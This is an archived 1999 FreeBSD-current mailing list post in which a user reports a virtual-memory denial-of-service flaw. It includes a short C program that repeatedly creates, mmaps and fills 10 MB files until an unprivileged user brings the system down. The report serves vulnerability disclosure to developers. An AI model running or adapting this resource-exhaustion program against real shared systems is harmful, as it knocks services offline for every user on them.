From owner-freebsd-current Fri Oct 29 3:19:38 1999 Delivered-To: freebsd-current@freebsd.org Received: from ipt2.iptelecom.net.ua (ipt2.iptelecom.net.ua [212.42.68.2]) by hub.freebsd.org (Postfix) with ESMTP id CD50E15657 for ; Fri, 29 Oct 1999 03:19:28 -0700 (PDT) (envelope-from sobomax@altavista.net) Received: from vega.vega.com (dialup3-26.iptelecom.net.ua [212.42.74.154]) by ipt2.iptelecom.net.ua (8.9.3/8.9.3) with ESMTP id NAA10057 for ; Fri, 29 Oct 1999 13:22:01 +0300 (EEST) Received: from altavista.net (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.9.3/8.9.3) with ESMTP id NAA58700 for ; Fri, 29 Oct 1999 13:18:53 +0300 (EEST) (envelope-from sobomax@altavista.net) Message-ID: <3819748D.46722BF6@altavista.net> Date: Fri, 29 Oct 1999 13:18:53 +0300 From: Maxim Sobolev Reply-To: sobomax@altavista.net Organization: Vega International Capital X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: uk,ru,en MIME-Version: 1.0 To: current@freebsd.org Subject: VM DOS attack Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-current@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Hi there, Probably it is already known problem, but it seems that any unprivileged malicious user with 15-20 MB disk quota can bring either 3-STABLE or 4-CURRENT system to its knees using relatively simple program. #include #include #include #include #include main() { int fd; int i; int len=1024*1024*10; /*ie 10Mbytes*/ caddr_t addr; char ttt[80]; for (i=0;;i++) { sprintf (ttt,"%d",i); fd=open(ttt,O_CREAT|O_RDWR,0666); if (fd<0) { printf("open error %ld\n",errno); exit(1); } lseek(fd,len-1,SEEK_SET); write(fd,"",1); addr=mmap(0,len,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0); if (addr==MAP_FAILED) { printf("mmap error %ld",errno); exit(1); } close(fd); memset(addr,'x',len); } } -Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-current" in the body of the message